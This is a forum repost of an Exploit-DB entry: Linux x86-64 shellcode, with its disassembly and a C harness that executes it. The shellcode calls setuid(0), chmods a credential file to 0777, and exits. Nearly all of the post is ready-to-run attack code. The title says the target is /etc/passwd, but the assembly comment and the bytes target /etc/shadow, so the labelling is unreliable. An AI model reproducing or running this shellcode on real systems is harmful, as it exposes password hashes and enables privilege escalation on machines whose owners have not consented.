Exploit Linux/x64 - setuid(0) + chmod (/etc/passwd 0777) + exit(0) Shellcode (63 bytes)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
13915
Проверка EDB
  1. Пройдено
Автор
JONATHAN SALWAN
Тип уязвимости
SHELLCODE
Платформа
LINUX_X86-64
CVE
N/A
Дата публикации
2010-06-17
C:
/*
Title:  Linux/x86-64 - setuid(0) & chmod ("/etc/passwd", 0777) & exit(0) - 63 bytes
Date:   2010-06-17
Tested: Archlinux x86_64 k2.6.33

Author: Jonathan Salwan
Web:    http://shell-storm.org | http://twitter.com/jonathansalwan

! Dtabase of shellcodes http://www.shell-storm.org/shellcode/



  <-- _setuid(0) -->
  400078:	48 31 ff             	xor    %rdi,%rdi
  40007b:	48 31 c0             	xor    %rax,%rax
  40007e:	b0 69                	mov    $0x69,%al
  400080:	0f 05                	syscall

  <-- _chmod("/etc/shadow", 0777) -->
  400082:	48 31 d2             	xor    %rdx,%rdx
  400085:	66 be ff 01          	mov    $0x1ff,%si
  400089:	48 bb ff ff ff ff ff 	mov    $0x776f64ffffffffff,%rbx
  400090:	64 6f 77 
  400093:	48 c1 eb 28          	shr    $0x28,%rbx
  400097:	53                   	push   %rbx
  400098:	48 bb 2f 65 74 63 2f 	mov    $0x6168732f6374652f,%rbx
  40009f:	73 68 61 
  4000a2:	53                   	push   %rbx
  4000a3:	48 89 e7             	mov    %rsp,%rdi
  4000a6:	48 31 c0             	xor    %rax,%rax
  4000a9:	b0 5a                	mov    $0x5a,%al

  <-- _exit(0) -->
  4000ab:	0f 05                	syscall 
  4000ad:	48 31 ff             	xor    %rdi,%rdi
  4000b0:	48 31 c0             	xor    %rax,%rax
  4000b3:	b0 3c                	mov    $0x3c,%al
  4000b5:	0f 05                	syscall
*/

#include <stdio.h>


char *SC =  "\x48\x31\xff\x48\x31\xc0\xb0\x69\x0f\x05"
            "\x48\x31\xd2\x66\xbe\xff\x01\x48\xbb\xff"
            "\xff\xff\xff\xff\x64\x6f\x77\x48\xc1\xeb"
            "\x28\x53\x48\xbb\x2f\x65\x74\x63\x2f\x73"
            "\x68\x61\x53\x48\x89\xe7\x48\x31\xc0\xb0"
            "\x5a\x0f\x05\x48\x31\xff\x48\x31\xc0\xb0"
            "\x3c\x0f\x05";

int main(void)
{
        fprintf(stdout,"Length: %d\n",strlen(SC));
        (*(void(*)()) SC)();
return 0;
}
 
Источник
www.exploit-db.com

Похожие темы